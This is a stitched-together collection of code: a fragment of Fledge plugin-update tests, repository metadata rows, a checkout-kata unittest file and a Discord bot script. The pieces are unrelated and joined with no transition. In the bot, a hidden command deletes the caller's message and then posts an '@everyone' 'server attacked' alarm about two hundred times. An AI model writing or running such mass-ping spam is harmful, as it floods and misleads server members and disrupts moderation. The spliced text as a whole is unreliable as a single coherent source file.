) as plugin_installed_patch:
with patch.object(storage_client_mock, 'insert_into_tbl',
return_value=_rv1) as insert_tbl_patch:
with patch('multiprocessing.Process'):
resp = await client.put('/fledge/plugins/{}/{}/update'.format(
_type, plugin_installed_dirname), data=None)
assert 200 == resp.status
result = await resp.text()
response = json.loads(result)
assert 'id' in response
assert '{} update started.'.format(pkg_name) == response['message']
assert response['statusLink'].startswith('fledge/package/update/status?id=')
args, kwargs = insert_tbl_patch.call_args_list[0]
assert 'packages' == args[0]
actual = json.loads(args[1])
assert 'id' in actual
assert pkg_name == actual['name']
assert 'update' == actual['action']
assert -1 == actual['status']
assert '' == actual['log_file_uri']
plugin_installed_patch.assert_called_once_with(plugin_type_installed_dir, False)
args, kwargs = query_tbl_patch.call_args_list[0]
assert 'packages' == args[0]
assert payload == json.loads(args[1])
@pytest.mark.parametrize("_type, plugin_installed_dirname", [
('notify', 'alexa'),
('rule', 'OutOfBound')
])
async def test_notify_plugin_update_when_in_use(self, client, _type, plugin_installed_dirname):
async def async_mock(return_value):
return return_value
plugin_type_installed_dir = "notificationRule" if _type == 'rule' else "notificationDelivery"
pkg_name = "fledge-{}-{}".format(_type, plugin_installed_dirname.lower())
payload = {"return": ["status"], "where": {"column": "action", "condition": "=", "value": "update",
"and": {"column": "name", "condition": "=", "value": pkg_name}}}
plugin_installed = [{"name": plugin_installed_dirname, "type": _type,
"description": "Generate a notification if the values exceeds a configured value",
"version": "1.8.1", "installedDirectory": "{}/{}".format(plugin_type_installed_dir,
plugin_installed_dirname),
"packageName": pkg_name}]
insert = {"response": "inserted", "rows_affected": 1}
insert_row = {'count': 1, 'rows': [{
"id": "c5648940-31ec-4f78-a7a5-b1707e8fe578",
"name": plugin_installed_dirname,
"action": "update",
"status": -1,
"log_file_uri": ""
}]}
notification_name = "Test Notification"
parent_name = "Notifications"
sch_info = {'count': 1, 'rows': [{'id': '6637c9ff-7090-4774-abca-07dee59a0610', 'enabled': 't'}]}
read_all_child_category_names = [{"parent": parent_name, "child": notification_name}]
read_cat_val = {"name": {"description": "The name of this notification", "type": "string",
"default": notification_name, "value": notification_name},
"description": {"description": "Description of this notification", "type": "string",
"default": "description", "value": "description"},
"rule": {"description": "Rule to evaluate", "type": "string",
"default": plugin_installed_dirname, "value": plugin_installed_dirname},
"channel": {"description": "Channel to send alert on", "type": "string",
"default": "email", "value": "email"},
"notification_type": {"description": "Type of notification", "type": "enumeration",
"options": ["one shot", "retriggered", "toggled"], "default": "one shot",
"value": "one shot"}, "enable": {"description": "Enabled",
"type": "boolean", "default": "true",
"value": "true"}}
disable_notification = {"description": "Enabled", "type": "boolean", "default": "true", "value": "false"}
storage_client_mock = MagicMock(StorageClientAsync)
# Changed in version 3.8: patch() now returns an AsyncMock if the target is an async function.
if sys.version_info.major == 3 and sys.version_info.minor >= 8:
_rv1 = await async_mock(read_all_child_category_names)
_rv2 = await async_mock(read_cat_val)
_rv3 = await async_mock(disable_notification)
_rv4 = await async_mock(insert)
_se1 = await async_mock({'count': 0, 'rows': []})
_se2 = await async_mock(insert_row)
_se3 = await async_mock(sch_info)
else:
_rv1 = asyncio.ensure_future(async_mock(read_all_child_category_names))
_rv2 = asyncio.ensure_future(async_mock(read_cat_val))
_rv3 = asyncio.ensure_future(async_mock(disable_notification))
_rv4 = asyncio.ensure_future(async_mock(insert))
_se1 = asyncio.ensure_future(async_mock({'count': 0, 'rows': []}))
_se2 = asyncio.ensure_future(async_mock(insert_row))
_se3 = asyncio.ensure_future(async_mock(sch_info))
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(storage_client_mock, 'query_tbl_with_payload',
side_effect=[_se1, _se3, _se2]) as query_tbl_patch:
with patch.object(PluginDiscovery, 'get_plugins_installed', return_value=plugin_installed
) as plugin_installed_patch:
with patch.object(ConfigurationManager, '_read_all_child_category_names',
return_value=_rv1) as child_cat_patch:
with patch.object(ConfigurationManager, '_read_category_val',
return_value=_rv2) as cat_value_patch:
with patch.object(plugins_update._logger, "warning") as log_warn_patch:
with patch.object(ConfigurationManager, 'set_category_item_value_entry',
return_value=_rv3) as set_cat_value_patch:
with patch.object(storage_client_mock, 'insert_into_tbl',
return_value=_rv4) as insert_tbl_patch:
with patch('multiprocessing.Process'):
resp = await client.put('/fledge/plugins/{}/{}/update'.format(
_type, plugin_installed_dirname), data=None)
assert 200 == resp.status
result = await resp.text()
response = json.loads(result)
assert 'id' in response
assert '{} update started.'.format(pkg_name) == response['message']
assert response['statusLink'].startswith('fledge/package/update/status?id=')
args, kwargs = insert_tbl_patch.call_args_list[0]
assert 'packages' == args[0]
actual = json.loads(args[1])
assert 'id' in actual
assert pkg_name == actual['name']
assert 'update' == actual['action']
assert -1 == actual['status']
assert '' == actual['log_file_uri']
set_cat_value_patch.assert_called_once_with(notification_name, 'enable', 'false')
assert 1 == log_warn_patch.call_count
log_warn_patch.assert_called_once_with(
'Disabling {} notification instance, as {} {} plugin is being updated...'.format(
notification_name, plugin_installed_dirname, _type))
cat_value_patch.assert_called_once_with(notification_name)
child_cat_patch.assert_called_once_with(parent_name)
plugin_installed_patch.assert_called_once_with(plugin_type_installed_dir, False)
args, kwargs = query_tbl_patch.call_args_list[0]
assert 'packages' == args[0]
assert payload == json.loads(args[1])
| 63.765321 | 135 | 0.533322 | 4,143 | 42,659 | 5.175235 | 0.068791 | 0.060165 | 0.059512 | 0.043655 | 0.903549 | 0.89021 | 0.87314 | 0.865165 | 0.858822 | 0.846183 | 0 | 0.022875 | 0.354392 | 42,659 | 668 | 136 | 63.860778 | 0.755637 | 0.019925 | 0 | 0.815661 | 0 | 0.001631 | 0.165498 | 0.046561 | 0 | 0 | 0 | 0 | 0.184339 | 1 | 0.001631 | false | 0 | 0.026101 | 0 | 0.044046 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
307555d64f4cd70c0175e65fbca0c5219002b3fe | 7,160 | py | Python | lib/solutions/CHK/checkout_tests.py | DPNT-Sourcecode/CHK-gzuu01 | 396e1b00340b9c07f0bcec79e5e10b4145762481 | [
"Apache-2.0"
] | null | null | null | lib/solutions/CHK/checkout_tests.py | DPNT-Sourcecode/CHK-gzuu01 | 396e1b00340b9c07f0bcec79e5e10b4145762481 | [
"Apache-2.0"
] | null | null | null | lib/solutions/CHK/checkout_tests.py | DPNT-Sourcecode/CHK-gzuu01 | 396e1b00340b9c07f0bcec79e5e10b4145762481 | [
"Apache-2.0"
] | null | null | null | import unittest
from checkout_solution import checkout, ITEM_PRICES
class TestCheckout(unittest.TestCase):
@unittest.skip("Not testing this round right now")
def test_round_1(self):
self.assertEqual(
checkout("ABCDABCDABCDA"),
130 + 50 + 45 + 30 + 20 * 3 + 15 * 3
)
self.assertEqual(checkout("CAABAAAAB"), 20 + 130 * 2 + 45)
self.assertEqual(checkout("WOOF"), -1)
self.assertEqual(checkout(525), -1)
self.assertEqual(checkout("525"), -1)
self.assertEqual(checkout(["A", "A", "B"]), -1)
@unittest.skip("Not testing this round right now")
def test_round_3(self):
self.assertEqual(checkout("BBEE"), 40 * 2 + 30)
self.assertEqual(checkout("BBBEE"), 40 * 2 + 45)
self.assertEqual(checkout("BBBE"), 45 + 30 + 40)
self.assertEqual(checkout("CAABAAB"), 20 + 130 + 50 + 45)
self.assertEqual(checkout("A" * 5), 200)
self.assertEqual(checkout("A" * 8), 200 + 130)
self.assertEqual(checkout("A" * 9), 200 + 130 + 50)
self.assertEqual(checkout("WOOF"), -1)
self.assertEqual(checkout(525), -1)
self.assertEqual(checkout("525"), -1)
self.assertEqual(checkout(["A", "A", "B"]), -1)
self.assertEqual(checkout("E" * 5), 40 * 5)
@unittest.skip("Not testing this round right now")
def test_round_4(self):
self.assertEqual(checkout("F" * 3), 20)
self.assertEqual(checkout("F" * 4), 30)
self.assertEqual(checkout("F" * 2), 20)
self.assertEqual(checkout("BB"), 45)
self.assertEqual(checkout("B"), 30)
self.assertEqual(checkout("BBB"), 45 + 30)
self.assertEqual(checkout("BBEE"), 40 * 2 + 30)
self.assertEqual(checkout("BBBEE"), 40 * 2 + 45)
self.assertEqual(checkout("BBBE"), 45 + 30 + 40)
self.assertEqual(checkout("CAABAAB"), 20 + 130 + 50 + 45)
self.assertEqual(checkout("A" * 5), 200)
self.assertEqual(checkout("A" * 8), 200 + 130)
self.assertEqual(checkout("A" * 9), 200 + 130 + 50)
self.assertEqual(checkout(525), -1)
self.assertEqual(checkout("525"), -1)
self.assertEqual(checkout(["A", "A", "B"]), -1)
self.assertEqual(checkout("E" * 5), 40 * 5)
self.assertEqual(checkout("A"), ITEM_PRICES["A"])
self.assertEqual(checkout("B"), ITEM_PRICES["B"])
self.assertEqual(checkout("C"), ITEM_PRICES["C"])
self.assertEqual(checkout("D"), ITEM_PRICES["D"])
self.assertEqual(checkout("E"), ITEM_PRICES["E"])
self.assertEqual(checkout("F"), ITEM_PRICES["F"])
self.assertEqual(checkout("G"), ITEM_PRICES["G"])
self.assertEqual(checkout("H"), ITEM_PRICES["H"])
self.assertEqual(checkout("I"), ITEM_PRICES["I"])
self.assertEqual(checkout("J"), ITEM_PRICES["J"])
self.assertEqual(checkout("K"), ITEM_PRICES["K"])
self.assertEqual(checkout("L"), ITEM_PRICES["L"])
self.assertEqual(checkout("M"), ITEM_PRICES["M"])
self.assertEqual(checkout("N"), ITEM_PRICES["N"])
self.assertEqual(checkout("O"), ITEM_PRICES["O"])
self.assertEqual(checkout("P"), ITEM_PRICES["P"])
self.assertEqual(checkout("Q"), ITEM_PRICES["Q"])
self.assertEqual(checkout("R"), ITEM_PRICES["R"])
self.assertEqual(checkout("S"), ITEM_PRICES["S"])
self.assertEqual(checkout("T"), ITEM_PRICES["T"])
self.assertEqual(checkout("U"), ITEM_PRICES["U"])
self.assertEqual(checkout("V"), ITEM_PRICES["V"])
self.assertEqual(checkout("W"), ITEM_PRICES["W"])
self.assertEqual(checkout("X"), ITEM_PRICES["X"])
self.assertEqual(checkout("Y"), ITEM_PRICES["Y"])
self.assertEqual(checkout("Z"), ITEM_PRICES["Z"])
self.assertEqual(checkout("V" * 3), 130)
self.assertEqual(checkout("V" * 2), 90)
self.assertEqual(checkout("V" * 5), 130 + 90)
self.assertEqual(checkout("V" * 6), 130 * 2)
self.assertEqual(checkout("V" * 7), 130 * 2 + 50)
def test_round_5(self):
self.assertEqual(checkout("F" * 3), 20)
self.assertEqual(checkout("F" * 4), 30)
self.assertEqual(checkout("F" * 2), 20)
self.assertEqual(checkout("BB"), 45)
self.assertEqual(checkout("B"), 30)
self.assertEqual(checkout("BBB"), 45 + 30)
self.assertEqual(checkout("BBEE"), 40 * 2 + 30)
self.assertEqual(checkout("BBBEE"), 40 * 2 + 45)
self.assertEqual(checkout("BBBE"), 45 + 30 + 40)
self.assertEqual(checkout("CAABAAB"), 20 + 130 + 50 + 45)
self.assertEqual(checkout("A" * 5), 200)
self.assertEqual(checkout("A" * 8), 200 + 130)
self.assertEqual(checkout("A" * 9), 200 + 130 + 50)
self.assertEqual(checkout(525), -1)
self.assertEqual(checkout("525"), -1)
self.assertEqual(checkout(["A", "A", "B"]), -1)
self.assertEqual(checkout("E" * 5), 40 * 5)
self.assertEqual(checkout("A"), ITEM_PRICES["A"])
self.assertEqual(checkout("B"), ITEM_PRICES["B"])
self.assertEqual(checkout("C"), ITEM_PRICES["C"])
self.assertEqual(checkout("D"), ITEM_PRICES["D"])
self.assertEqual(checkout("E"), ITEM_PRICES["E"])
self.assertEqual(checkout("F"), ITEM_PRICES["F"])
self.assertEqual(checkout("G"), ITEM_PRICES["G"])
self.assertEqual(checkout("H"), ITEM_PRICES["H"])
self.assertEqual(checkout("I"), ITEM_PRICES["I"])
self.assertEqual(checkout("J"), ITEM_PRICES["J"])
self.assertEqual(checkout("K"), ITEM_PRICES["K"])
self.assertEqual(checkout("L"), ITEM_PRICES["L"])
self.assertEqual(checkout("M"), ITEM_PRICES["M"])
self.assertEqual(checkout("N"), ITEM_PRICES["N"])
self.assertEqual(checkout("O"), ITEM_PRICES["O"])
self.assertEqual(checkout("P"), ITEM_PRICES["P"])
self.assertEqual(checkout("Q"), ITEM_PRICES["Q"])
self.assertEqual(checkout("R"), ITEM_PRICES["R"])
self.assertEqual(checkout("S"), ITEM_PRICES["S"])
self.assertEqual(checkout("T"), ITEM_PRICES["T"])
self.assertEqual(checkout("U"), ITEM_PRICES["U"])
self.assertEqual(checkout("V"), ITEM_PRICES["V"])
self.assertEqual(checkout("W"), ITEM_PRICES["W"])
self.assertEqual(checkout("X"), ITEM_PRICES["X"])
self.assertEqual(checkout("Y"), ITEM_PRICES["Y"])
self.assertEqual(checkout("Z"), ITEM_PRICES["Z"])
self.assertEqual(checkout("V" * 3), 130)
self.assertEqual(checkout("V" * 2), 90)
self.assertEqual(checkout("V" * 5), 130 + 90)
self.assertEqual(checkout("V" * 6), 130 * 2)
self.assertEqual(checkout("V" * 7), 130 * 2 + 50)
self.assertEqual(checkout("STXYZ"), 45 + 20 + 17)
self.assertEqual(checkout("STXYZ" * 2), 45 * 3 + 17)
self.assertEqual(checkout("Z" * 4), 45 + 21)
self.assertEqual(checkout("S" * 4), 45 + 20)
self.assertEqual(checkout("T" * 4), 45 + 20)
self.assertEqual(checkout("Y" * 4), 45 + 20)
self.assertEqual(checkout("X" * 4), 45 + 17)
if __name__ == "__main__":
unittest.main()
| 48.378378 | 66 | 0.595112 | 881 | 7,160 | 4.757094 | 0.091941 | 0.433071 | 0.664042 | 0.085898 | 0.915533 | 0.914817 | 0.894775 | 0.894775 | 0.894775 | 0.894775 | 0 | 0.059253 | 0.215084 | 7,160 | 147 | 67 | 48.707483 | 0.686477 | 0 | 0 | 0.845588 | 0 | 0 | 0.052676 | 0 | 0 | 0 | 0 | 0 | 0.889706 | 1 | 0.029412 | false | 0 | 0.014706 | 0 | 0.051471 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
0631f0d7dfcd3541295b96835b15242f62b590f1 | 35,884 | py | Python | rainbow.py | ShadowCrackerStudio/rainbow | 6634cdb54db65e68321e993908f3c2b43613e017 | [
"MIT"
] | null | null | null | rainbow.py | ShadowCrackerStudio/rainbow | 6634cdb54db65e68321e993908f3c2b43613e017 | [
"MIT"
] | null | null | null | rainbow.py | ShadowCrackerStudio/rainbow | 6634cdb54db65e68321e993908f3c2b43613e017 | [
"MIT"
] | null | null | null | import discord
from discord.ext.commands import *
from discord.ext import commands
import random
import asyncio
import time
import json
from itertools import cycle
import time
from threading import Thread
from random import randint
import datetime
import os
import aiohttp
import sys
import traceback
import json
from discord.utils import get
import youtube_dl
import cat
import shutil
import subprocess
import hashlib
bot = commands.Bot(command_prefix='s')
client = commands.Bot(command_prefix='s')
bot.remove_command('help')
@bot.event
async def on_ready():
print('Bejelentkezve! Scrappy - Online')
await bot.change_presence(status=discord.Status.online, activity=discord.Game("Segitség » shelp"))
@bot.command(pass_context=True)
async def hjurib7777(ctx):
await ctx.message.delete()
if ctx.guild.name == "Scrappy | OFFICIAL":
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
